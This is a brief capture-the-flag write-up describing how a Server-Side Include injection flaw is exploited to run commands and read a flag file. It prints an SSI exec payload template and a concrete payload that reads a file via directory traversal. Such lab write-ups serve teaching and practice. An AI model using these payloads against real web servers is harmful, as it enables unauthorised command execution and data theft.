Exploit the SSI Injection vulnerability to obtain RCE and read the flag.
This exercise is pretty straightfoward, since we just have to adapt the exec command on the application.
<!--#exec cmd="UNIX command" -->
After looking into the directories we managed to get the flag with the command above!
Last updated 9 months ago
<!--#exec cmd="cat ../../../flag.txt" -->
